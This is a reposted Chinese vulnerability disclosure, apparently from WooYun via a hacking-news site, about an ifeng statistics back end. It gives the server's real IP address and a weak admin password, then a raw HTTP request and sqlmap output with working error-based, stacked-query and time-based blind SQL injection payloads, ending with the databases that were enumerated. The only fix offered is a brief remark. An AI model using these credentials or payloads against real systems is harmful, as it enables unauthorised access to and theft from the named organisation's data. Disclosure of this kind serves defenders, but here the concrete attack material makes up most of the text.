记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

凤凰网某后台存在SQL注入

2016-05-31 16:20

扫一下c段,

发现这个

http://211.151.175.94/

存在弱口令 admin 密码 1qaz2wsx

屏幕快照 2016-04-12 10.24.21.png



数据统计系统

这里面注入就很多了。

code 区域
GET /ad/cps?alertType=inline&pagesize=20&btnsubmit=%25E6%2590%259C%25E7%25B4%25A2&game=0&adid=1*&starttime=20160412&adname=1&endtime=20160412 HTTP/1.1

Host: 211.151.175.94

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6

Proxy-Connection: keep-alive

Connection: keep-alive

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.57 Safari/537.36

Host: 211.151.175.94

Referer: http://211.151.175.94/ad/cps

Cookie: PHPSESSID=9maggi0nc8jcrl6rt6svsibr62

Upgrade-Insecure-Requests: 1

Accept-Encoding: gzip, deflate, sdch

漏洞证明:

屏幕快照 2016-04-12 10.32.08.png





code 区域
---

Parameter: #1* (URI)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: http://211.151.175.94:80/ad/cps?alertType=inline&pagesize=20&btnsubmit=%E6%90%9C%E7%B4%A2&game=0&adid=1 AND (SELECT 8742 FROM(SELECT COUNT(*),CONCAT(0x7171716b71,(SELECT (ELT(8742=8742,1))),0x7178707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&starttime=20160412&adname=1&endtime=20160412



Type: stacked queries

Title: MySQL > 5.0.11 stacked queries (SELECT - comment)

Payload: http://211.151.175.94:80/ad/cps?alertType=inline&pagesize=20&btnsubmit=%E6%90%9C%E7%B4%A2&game=0&adid=1;(SELECT * FROM (SELECT(SLEEP(5)))GoJQ)#&starttime=20160412&adname=1&endtime=20160412



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: http://211.151.175.94:80/ad/cps?alertType=inline&pagesize=20&btnsubmit=%E6%90%9C%E7%B4%A2&game=0&adid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NWid)&starttime=20160412&adname=1&endtime=20160412

---

back-end DBMS: MySQL >= 5.0.0

available databases [2]:

[*] ifeng_stat

[*] information_schema

修复方案:

最好放在内网,验证码一定要有

知识来源: www.wooyun.org/bugs/wooyun-2016-0195329

阅读:67671 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“凤凰网某后台存在SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词